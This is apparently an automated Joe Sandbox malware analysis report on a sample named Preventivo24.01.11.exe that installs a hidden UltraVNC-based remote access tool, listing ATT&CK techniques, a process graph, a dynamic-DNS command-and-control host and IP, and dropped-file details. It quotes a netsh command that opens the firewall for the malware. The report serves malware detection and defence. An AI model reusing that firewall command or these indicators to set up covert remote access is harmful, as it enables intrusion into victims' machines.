Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality

barindex
Source: taskhost.exe, 00000029.00000002.3497479719.0000000003A6D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
1
Spearphishing Link
1
Windows Management Instrumentation
1
DLL Side-Loading
1
Exploitation for Privilege Escalation
21
Disable or Modify Tools
OS Credential Dumping2
System Time Discovery
1
Remote Desktop Protocol
1
Archive Collected Data
Exfiltration Over Other Network Medium3
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
System Shutdown/Reboot
Acquire InfrastructureGather Victim Identity Information
1
Valid Accounts
3
Native API
1
Valid Accounts
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory11
Peripheral Device Discovery
1
Replication Through Removable Media
Data from Removable MediaExfiltration Over Bluetooth11
Encrypted Channel
SIM Card SwapObtain Device Cloud Backups1
Defacement
DomainsCredentials
1
Replication Through Removable Media
112
Command and Scripting Interpreter
1
Bootkit
1
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager1
Account Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Standard Port
Data Encrypted for ImpactDNS ServerEmail Addresses
Local AccountsCronLogin Hook1
Access Token Manipulation
1
Timestomp
NTDS5
File and Directory Discovery
Distributed Component Object ModelInput CaptureTraffic Duplication1
Remote Access Software
Data DestructionVirtual Private ServerEmployee Names
Cloud AccountsLaunchdNetwork Logon Script13
Process Injection
1
DLL Side-Loading
LSA Secrets37
System Information Discovery
SSHKeyloggingScheduled Transfer3
Non-Application Layer Protocol
Data Encrypted for ImpactServerGather Victim Network Information
Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Masquerading
Cached Domain Credentials1
Query Registry
VNCGUI Input CaptureData Transfer Size Limits14
Application Layer Protocol
Service StopBotnetDomain Properties
External Remote ServicesSystemd TimersStartup ItemsStartup Items1
Valid Accounts
DCSync41
Security Software Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry
Proc Filesystem1
Virtualization/Sandbox Evasion
Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadow3
Process Discovery
Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
Supply Chain CompromisePowerShellCronCron1
Access Token Manipulation
Network Sniffing1
Application Window Discovery
Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
Process Injection
Input Capture1
System Owner/User Discovery
Software Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Bootkit
KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1379424 Sample: Preventivo24.01.11.exe Startdate: 23/01/2024 Architecture: WINDOWS Score: 76 87 www.example.com 2->87 89 vnvariant2024.ddnsfree.com 2->89 103 Snort IDS alert for network traffic 2->103 105 Multi AV Scanner detection for submitted file 2->105 13 viewer.exe 1 2->13         started        15 Preventivo24.01.11.exe 73 2->15         started        signatures3 process4 dnsIp5 19 cmd.exe 3 3 13->19         started        95 www.example.com 93.184.216.34, 49729, 80 EDGECASTUS European Union 15->95 79 C:\Users\user\AppData\...\vnchooks.dll, PE32 15->79 dropped 81 C:\Users\user\AppData\Roaming\...\viewer.exe, PE32 15->81 dropped 83 C:\Users\user\AppData\...\taskhost.exe, PE32 15->83 dropped 85 6 other files (none is malicious) 15->85 dropped 22 msiexec.exe 2 15->22         started        file6 process7 signatures8 107 Uses cmd line tools excessively to alter registry or file data 19->107 109 Uses netsh to modify the Windows network and firewall settings 19->109 111 Modifies the windows firewall 19->111 24 viewer.exe 1 19->24         started        26 cmd.exe 1 19->26         started        29 Acrobat.exe 8 74 19->29         started        31 11 other processes 19->31 process9 signatures10 33 cmd.exe 24->33         started        119 Uses cmd line tools excessively to alter registry or file data 26->119 36 reg.exe 1 26->36         started        38 AcroCEF.exe 29->38         started        process11 signatures12 101 Uses cmd line tools excessively to alter registry or file data 33->101 40 cmd.exe 33->40         started        42 viewer.exe 33->42         started        44 cmd.exe 33->44         started        50 10 other processes 33->50 47 AcroCEF.exe 38->47         started        process13 dnsIp14 52 taskhost.exe 40->52         started        56 mode.com 40->56         started        58 netsh.exe 40->58         started        66 3 other processes 40->66 60 cmd.exe 42->60         started        121 Uses cmd line tools excessively to alter registry or file data 44->121 62 reg.exe 44->62         started        97 52.202.204.11, 443, 49738, 49740 AMAZON-AESUS United States 47->97 99 23.54.200.159, 443, 49747 AKAMAI-ASUS United States 47->99 64 cmd.exe 50->64         started        signatures15 process16 dnsIp17 91 vnvariant2024.ddnsfree.com 140.228.29.110, 49749, 5500 OARNET-ASUS United States 52->91 93 127.0.0.1 unknown unknown 52->93 115 Contains functionalty to change the wallpaper 52->115 117 Contains VNC / remote desktop functionality (version string found) 52->117 68 cmd.exe 60->68         started        71 conhost.exe 60->71         started        73 cmd.exe 60->73         started        75 conhost.exe 64->75         started        signatures18 process19 signatures20 113 Uses cmd line tools excessively to alter registry or file data 68->113 77 reg.exe 68->77         started        process21

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Preventivo24.01.11.exe8%ReversingLabs
Preventivo24.01.11.exe17%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\MSI6F00.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi6E82.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe8%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://sectigo.com/CPS00%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
https://forum.uvnc.comvncMenu::WndProc0%Avira URL Cloudsafe
http://html4/loose.dtd0%Avira URL Cloudsafe
https://www.uvnc.comhttps://forum.uvnc.comnet0%Avira URL Cloudsafe
http://.jpg0%Avira URL Cloudsafe
http://.css0%Avira URL Cloudsafe
https://www.uvnc.comcmd0%Avira URL Cloudsafe
http://java.sun.com/products/plugin/index.html#download0%Avira URL Cloudsafe
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=10%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.example.com
93.184.216.34
truefalse
    high
    vnvariant2024.ddnsfree.com
    140.228.29.110
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://www.example.com/download/updates.txtfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://html4/loose.dtdshi6E82.tmp.0.drfalse
        • Avira URL Cloud: safe
        low
        http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://sectigo.com/CPS0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
        • URL Reputation: safe
        unknown
        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
        • URL Reputation: safe
        unknown
        http://ocsp.sectigo.com0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
        • URL Reputation: safe
        unknown
        http://ocsp.thawte.com0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drfalse
        • URL Reputation: safe
        unknown
        http://www.pdf-tools.comPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.drfalse
          high
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
          • URL Reputation: safe
          unknown
          https://www.uvnc.comtaskhost.exe.0.drfalse
            high
            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
            • URL Reputation: safe
            unknown
            http://.cssshi6E82.tmp.0.drfalse
            • Avira URL Cloud: safe
            low
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
            • URL Reputation: safe
            unknown
            https://forum.uvnc.comtaskhost.exe.0.drfalse
              high
              https://www.uvnc.comcmdPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
              • URL Reputation: safe
              unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drfalse
                high
                https://www.thawte.com/cps0/Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drfalse
                  high
                  https://forum.uvnc.comvncMenu::WndProcPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
                  • Avira URL Cloud: safe
                  low
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.thawte.com/repository0WPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drfalse
                    high
                    https://www.advancedinstaller.comPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drfalse
                      high
                      https://www.uvnc.comhttps://forum.uvnc.comnetPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://java.sun.com/products/plugin/index.html#downloadPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://.jpgshi6E82.tmp.0.drfalse
                      • Avira URL Cloud: safe
                      low
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      52.202.204.11
                      unknownUnited States
                      14618AMAZON-AESUSfalse
                      93.184.216.34
                      www.example.comEuropean Union
                      15133EDGECASTUSfalse
                      23.54.200.159
                      unknownUnited States
                      16625AKAMAI-ASUSfalse
                      140.228.29.110
                      vnvariant2024.ddnsfree.comUnited States
                      600OARNET-ASUSfalse
                      IP
                      127.0.0.1
                      Joe Sandbox version:38.0.0 Ammolite
                      Analysis ID:1379424
                      Start date and time:2024-01-23 12:17:10 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 54s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:59
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Preventivo24.01.11.exe
                      Detection:MAL
                      Classification:mal76.rans.troj.evad.winEXE@110/77@8/5
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 60%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 72.21.81.240, 23.63.204.182, 172.64.41.3, 162.159.61.3, 23.55.62.18, 23.55.62.67, 23.47.204.60, 23.47.204.78, 23.47.204.62, 23.47.204.51, 23.47.204.71, 23.47.204.8, 23.47.204.33, 23.34.82.78, 23.34.82.70
                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, geo2.adobe.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):10
                      Entropy (8bit):2.9219280948873623
                      Encrypted:false
                      SSDEEP:3:DdWcw:Bbw
                      MD5:EF303119CD5A401423EFE69D77275604
                      SHA1:0D2534C78AE7A1FD9CC5FF0DDED77800B171F787
                      SHA-256:F1A65F2D0644D187AFD37F75EDC06E25D412C3A6218619A39101C2A5CDCB61EA
                      SHA-512:CAA5CA40AEAD79316B20A3F6977B255D2677F7472642579D405A945137E3B7F9661C655510D6A6761E046910335E3953C40BF3AD77671EAF237895A7B03F718C
                      Malicious:false
                      Preview:5383948 ..
                      Process:C:\Games\taskhost.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):1421
                      Entropy (8bit):4.919536877398004
                      Encrypted:false
                      SSDEEP:24:y38ApvI/dg3KtcJaAwp+Sjh31Nemb31NemnGRyQEgshgOZbHNDuwOZxD//P33k34:y3LFI/dg3XJaAwp+Sj7txtG8kshgMb5i
                      MD5:6EF42238183882749CCFD368788B3A3C
                      SHA1:E33154329DD1916C0F605B115F0BE7A77BFF6EA7
                      SHA-256:DF25EFF50326E1DDF0A3489EA946A392902E6207ECA623E88A7BF4456BDF78B0
                      SHA-512:632DA8709411633142BF496AD76E4DC833FD5D41DA903CC27A15E2D00F5D03403E0BD81BC150FEC000B560DC78E472DCC2276F207957629D90B8EEDE8CA67675
                      Malicious:false
                      Preview:Tue Jan 23 12:18:21 2024.WinVNCAppMain : WinVNCAPPMain-----Application started.WinVNCAppMain : server created ok.imp_desktop_thread : OpenInputdesktop OK.imp_desktop_thread : SelectHDESK to Default (370) from 11c.imp_desktop_thread : Username user .vncMenu::vncMenu : vncmenu(server).Tue Jan 23 12:18:22 2024.vncServer::SetAuthHosts : authhosts cleared.vncServer::EnableConnections : SockConnect 0.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : trying port number 5900.Tue Jan 23 12:18:24 2024.VSocket::Close : closing socket.vncServer::EnableConnections : SockConnect Done 1.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : SockConnect 1.vncSockConnectThread::run_undetached : started socket connection thread.vncHTTPConnectThread::run_undetached : started HTTP server thread.imp_desktop_thread : PostAddNewClient IIIII.Tue Jan 23 12:18:25 2024.vncServer::AutoConnectRetry : AutoConnectRetry(): started.vncServer::actualRetryThread : Attempt
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):292
                      Entropy (8bit):5.252775680408843
                      Encrypted:false
                      SSDEEP:6:HMWpPUM8Q+q2Pwkn2nKuAl9OmbnIFUt8+MWpPUMmbQgZmw++MWpPUMm8uDQdSQVW:H5PP8VvYfHAahFUt8+5PPOQg/++5PP1w
                      MD5:60425B4FF8C1C1A6F2D0092A7F15EF6F
                      SHA1:662F7165E9DCE1C85B5F6C60853F13E5E9658325
                      SHA-256:9D98E231F4FBCA538ACE193C53EF5A47A733EECB05FA83DA1A009FE2E61B52AC
                      SHA-512:CCCC61F24A9C032BBE9A5A44286BF8FBB8FF5077C367AC9B89636408F56BEEF62B7D3F92C8209757EFD7753B617F6AECAC6CAC5681B25990F686B416510BF88F
                      Malicious:false
                      Preview:2024/01/23-12:18:09.699 1f58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:18:09.702 1f58 Recovering log #3.2024/01/23-12:18:09.703 1f58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):292
                      Entropy (8bit):5.252775680408843
                      Encrypted:false
                      SSDEEP:6:HMWpPUM8Q+q2Pwkn2nKuAl9OmbnIFUt8+MWpPUMmbQgZmw++MWpPUMm8uDQdSQVW:H5PP8VvYfHAahFUt8+5PPOQg/++5PP1w
                      MD5:60425B4FF8C1C1A6F2D0092A7F15EF6F
                      SHA1:662F7165E9DCE1C85B5F6C60853F13E5E9658325
                      SHA-256:9D98E231F4FBCA538ACE193C53EF5A47A733EECB05FA83DA1A009FE2E61B52AC
                      SHA-512:CCCC61F24A9C032BBE9A5A44286BF8FBB8FF5077C367AC9B89636408F56BEEF62B7D3F92C8209757EFD7753B617F6AECAC6CAC5681B25990F686B416510BF88F
                      Malicious:false
                      Preview:2024/01/23-12:18:09.699 1f58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:18:09.702 1f58 Recovering log #3.2024/01/23-12:18:09.703 1f58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):336
                      Entropy (8bit):5.19553724333011
                      Encrypted:false
                      SSDEEP:6:HMWpPUMmQuH0jyq2Pwkn2nKuAl9Ombzo2jMGIFUt8+MWpPUMmSc511Zmw++MWpP1:H5PPVI0jyvYfHAa8uFUt8+5PPlcV/++b
                      MD5:6111CAE82E5ED6DFB2D5ED0321FCFE6D
                      SHA1:4B71E616B9216D8A038A54202BF10E48364A432B
                      SHA-256:C8FF27F73BEDF7198BD15020DA2A6438AED615B40654BAE2E84D64DDAB4E1A46
                      SHA-512:410B42C40DE1177727C5E5677BEFCCBAEA254F92EAC133A6167D99A61FA850C0A27B85F49B9B483F8CF7C2052CB26DB4EFDABAA21DF28DE986A12988B09836AB
                      Malicious:false
                      Preview:2024/01/23-12:18:09.769 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/01/23-12:18:09.771 1be4 Recovering log #3.2024/01/23-12:18:09.771 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):336
                      Entropy (8bit):5.19553724333011
                      Encrypted:false
                      SSDEEP:6:HMWpPUMmQuH0jyq2Pwkn2nKuAl9Ombzo2jMGIFUt8+MWpPUMmSc511Zmw++MWpP1:H5PPVI0jyvYfHAa8uFUt8+5PPlcV/++b
                      MD5:6111CAE82E5ED6DFB2D5ED0321FCFE6D
                      SHA1:4B71E616B9216D8A038A54202BF10E48364A432B
                      SHA-256:C8FF27F73BEDF7198BD15020DA2A6438AED615B40654BAE2E84D64DDAB4E1A46
                      SHA-512:410B42C40DE1177727C5E5677BEFCCBAEA254F92EAC133A6167D99A61FA850C0A27B85F49B9B483F8CF7C2052CB26DB4EFDABAA21DF28DE986A12988B09836AB
                      Malicious:false
                      Preview:2024/01/23-12:18:09.769 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/01/23-12:18:09.771 1be4 Recovering log #3.2024/01/23-12:18:09.771 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:modified
                      Size (bytes):475
                      Entropy (8bit):4.9650414169567965
                      Encrypted:false
                      SSDEEP:12:YH/um3RA8sqZQiysBdOg2H4caq3QYiubInP7E4T3y:Y2sRdsC3dMHz3QYhbG7nby
                      MD5:DB44F690ED46A9B57D69DF5164126886
                      SHA1:E7E352F6B3C35C5355DC9FC134506E2261894692
                      SHA-256:C67D0B042F36E540543294FDA5079CE6726D68234D1EE935CB4DC0FDEF5E29CA
                      SHA-512:918E36E5170CC2B5FFB905161A9C89E2FC25E42AF3BA7425B2D71A5D35F648437B5B1AF7067DF6F8EACA2C921D388CBD7FFDD5F70B382992DF8C9C9E3C551912
                      Malicious:false
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13350568701451515","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":119225},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):475
                      Entropy (8bit):4.9650414169567965
                      Encrypted:false
                      SSDEEP:12:YH/um3RA8sqZQiysBdOg2H4caq3QYiubInP7E4T3y:Y2sRdsC3dMHz3QYhbG7nby
                      MD5:DB44F690ED46A9B57D69DF5164126886
                      SHA1:E7E352F6B3C35C5355DC9FC134506E2261894692
                      SHA-256:C67D0B042F36E540543294FDA5079CE6726D68234D1EE935CB4DC0FDEF5E29CA
                      SHA-512:918E36E5170CC2B5FFB905161A9C89E2FC25E42AF3BA7425B2D71A5D35F648437B5B1AF7067DF6F8EACA2C921D388CBD7FFDD5F70B382992DF8C9C9E3C551912
                      Malicious:false
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13350568701451515","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":119225},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4320
                      Entropy (8bit):5.256625461075982
                      Encrypted:false
                      SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7bYLrG/y:etJCV4FiN/jTN/2r8Mta02fEhgO73gos
                      MD5:94220663132224431A0735E6DC62D8D9
                      SHA1:A20AAFC67813BBCA896816A65D1796516A549965
                      SHA-256:9B0DE5074BE034AEEA10A3F651C0F988324F1658E88875A6278269941CF514EB
                      SHA-512:E59336BA9AD339BF3AFF78BF4E972B00EA895D6DFCA0C72C9EA57B24D48196EAB5067616231EE685B7D3F1C75248ED0C4375AD8E5B0A9EACF5E39865E20078E3
                      Malicious:false
